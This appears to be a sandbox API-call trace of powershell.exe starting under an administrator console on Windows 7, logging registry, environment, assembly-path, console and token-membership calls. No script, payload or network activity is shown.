	[0635.641] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x0, puLen=0x1cdf10) returned 0
	[0635.642] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdee8, puLen=0x1cdee0 | out: lplpBuffer=0x1cdee8*=0x2d5784c, puLen=0x1cdee0) returned 1
	[0635.642] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0635.642] VerLanguageNameW (in: wLang=0x0, szLang=0x371d50, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0635.642] CoTaskMemFree (pv=0x371d50) 
	[0635.642] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\", lplpBuffer=0x1cdf38, puLen=0x1cdf30 | out: lplpBuffer=0x1cdf38*=0x2d577d8, puLen=0x1cdf30) returned 1
	[0635.651] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0635.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0635.651] CoTaskMemFree (pv=0x3c3ff0) 
	[0637.388] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0637.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0637.388] CoTaskMemFree (pv=0x3c3ff0) 
	[0637.393] lstrlenW (lpString="䅁") returned 1
	[0637.403] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cde08 | out: phkResult=0x1cde08*=0x308) returned 0x0
	[0637.405] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cddf8 | out: phkResult=0x1cddf8*=0x30c) returned 0x0
	[0637.405] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cde88 | out: phkResult=0x1cde88*=0x310) returned 0x0
	[0637.410] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cddcc, lpData=0x0, lpcbData=0x1cddc8*=0x0 | out: lpType=0x1cddcc*=0x1, lpData=0x0, lpcbData=0x1cddc8*=0x56) returned 0x0
	[0637.411] CoTaskMemAlloc (cb=0x5a) returned 0x3d7d90
	[0637.411] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdd9c, lpData=0x3d7d90, lpcbData=0x1cdd98*=0x56 | out: lpType=0x1cdd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdd98*=0x56) returned 0x0
	[0637.411] CoTaskMemFree (pv=0x3d7d90) 
	[0637.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0639.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0639.317] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0639.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0639.317] CoTaskMemFree (pv=0x3c3ff0) 
	[0650.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0650.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0655.205] CoTaskMemAlloc (cb=0x104) returned 0x3c4100
	[0655.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.206] CoTaskMemFree (pv=0x3c4100) 
	[0655.207] CoTaskMemAlloc (cb=0x104) returned 0x3c4100
	[0655.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.207] CoTaskMemFree (pv=0x3c4100) 
	[0657.037] CoTaskMemAlloc (cb=0x104) returned 0x3c4100
	[0657.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.037] CoTaskMemFree (pv=0x3c4100) 
	[0657.039] CoTaskMemAlloc (cb=0x104) returned 0x3c4100
	[0657.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.039] CoTaskMemFree (pv=0x3c4100) 
	[0657.039] CoTaskMemAlloc (cb=0x104) returned 0x3c4100
	[0657.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.039] CoTaskMemFree (pv=0x3c4100) 
	[0662.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0662.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0662.176] CoTaskMemAlloc (cb=0x104) returned 0x3c4100
	[0662.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0662.176] CoTaskMemFree (pv=0x3c4100) 
	[0662.180] CoTaskMemAlloc (cb=0x104) returned 0x3c4100
	[0662.180] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0662.180] CoTaskMemFree (pv=0x3c4100) 
	[0665.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0665.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0675.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0675.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0677.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0677.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0684.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0684.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0695.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0695.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0703.334] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0703.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0703.334] CoTaskMemFree (pv=0x3c4320) 
	[0703.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0703.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0703.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0703.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0710.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1cdae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0710.406] SetErrorMode (uMode=0x1) returned 0x1
	[0710.406] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1cdd60 | out: lpFileInformation=0x1cdd60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0710.406] SetErrorMode (uMode=0x1) returned 0x1
	[0721.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0722.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0722.770] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0722.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.770] CoTaskMemFree (pv=0x3c4320) 
	[0722.773] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0722.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.773] CoTaskMemFree (pv=0x3c4320) 
	[0722.773] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0722.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.773] CoTaskMemFree (pv=0x3c4320) 
	[0722.776] CoCreateGuid (in: pguid=0x1ce128 | out: pguid=0x1ce128*(Data1=0x6eb055cd, Data2=0x39ff, Data3=0x4102, Data4=([0]=0xb8, [1]=0xce, [2]=0xb7, [3]=0xfc, [4]=0xa8, [5]=0x7e, [6]=0xba, [7]=0xff))) returned 0x0
	[0722.780] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0722.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.780] CoTaskMemFree (pv=0x3c4320) 
	[0722.783] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0722.783] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.783] CoTaskMemFree (pv=0x3c4320) 
	[0722.785] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0722.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.786] CoTaskMemFree (pv=0x3c4320) 
	[0722.807] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0724.371] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1cddd0 | out: lpConsoleScreenBufferInfo=0x1cddd0) returned 1
	[0724.387] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0724.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1cddd0 | out: lpConsoleScreenBufferInfo=0x1cddd0) returned 1
	[0724.389] GetVersionExW (in: lpVersionInformation=0x1cdd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0724.392] GetCurrentProcess () returned 0xffffffffffffffff
	[0724.393] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1cddf8 | out: TokenHandle=0x1cddf8*=0x318) returned 1
	[0724.397] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cdd18 | out: TokenInformation=0x0, ReturnLength=0x1cdd18) returned 0
	[0724.398] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x337310
	[0724.398] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x337310, TokenInformationLength=0x4, ReturnLength=0x1cdd18 | out: TokenInformation=0x337310, ReturnLength=0x1cdd18) returned 1
	[0724.400] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1cde78 | out: phNewToken=0x1cde78*=0x308) returned 1
	[0724.400] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cdd18 | out: TokenInformation=0x0, ReturnLength=0x1cdd18) returned 0
	[0724.400] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x337340
	[0724.400] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x337340, TokenInformationLength=0x4, ReturnLength=0x1cdd18 | out: TokenInformation=0x337340, ReturnLength=0x1cdd18) returned 1
	[0724.401] CheckTokenMembership (in: TokenHandle=0x308, SidToCheck=0x2d182f0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1cde88 | out: IsMember=0x1cde88) returned 1
	[0724.402] CloseHandle (hObject=0x308) returned 1
	[0724.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0724.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0724.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0724.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.594] CoTaskMemAlloc (cb=0x804) returned 0x2887210
	[0727.594] GetConsoleTitleW (in: lpConsoleTitle=0x2887210, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0727.594] CoTaskMemFree (pv=0x2887210) 
	[0727.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
